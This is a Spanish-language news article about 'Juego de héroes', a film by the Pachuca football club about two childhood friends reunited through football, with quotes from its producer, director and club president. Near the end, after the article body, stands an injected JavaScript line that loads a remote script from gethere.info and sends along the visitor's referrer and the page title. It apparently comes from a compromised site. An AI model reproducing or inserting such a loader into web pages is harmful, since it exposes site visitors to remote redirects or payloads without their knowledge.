Tuzos estrena hoy su película “Juego de héroes”

Pachuca @Tuzos tendrá su propia cinta en la cual contarán la historia de dos amigos unidos por el futbol.

El futbol también se ve en pantalla grande, desde la salas de cine, donde también se llora y se ríe, desde donde el juego puede llevarte de la pasión a la reflexión sobre los contrastes de la vida. Así sucede en la película que el Club Pachuca estrena este fin de semana: ‘Juego de héroes’.

Es una cinta emotiva, relato de cómo dos apasionados al futbol, Luis (Sebastián Zurita) y Carlitos (Francisco Villalvazo), distintos diametralmente, enlazan sus caminos en torno al balón.

Por azares del destino, ambos se separan desde pequeños, uno se transforma en una estrella de futbol, mientras que el otro, una persona con capacidades diferentes, se integra a un orfanato donde desarrolla un maravilloso don. Después de 10 años, los amigos se reencuentran para cambiar sus vidas para siempre, gracias al futbol.

“Quisimos hacer una historia interesante, llena de acción que a su vez permitiera llevar al público un mensaje”, explica Juan Manuel Robles, productor. Jesús Martínez Patiño, presidente del Pachuca, resalta los valores que proyecta la cinta: “futbol, amistad y la vida”, principios
ligados también al club de la Bella Airosa.

“La intención fue hacer una historia familiar con carácter universal, que donde quiera que se exhiba tenga afinidad con la audiencia”, añade.

Por su parte, el director Pedro Álvarez Tostado explica: “No queríamos hacer un documental sino una historia alrededor del club, nos gustó la propuesta sobre estos personajes que nacen el mismo día, personas muy diferentes y sus sueños a realizar”.

La película fue filmada en las instalaciones del club de futbol Pachuca y locaciones del Estado de Hidalgo, se estrena este fin de semana y será distribuida en más de 400 salas de cine a nivel nacional.

 

s.src=’http://gethere.info/kt/?264dpr&frm=&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Etiquetas:|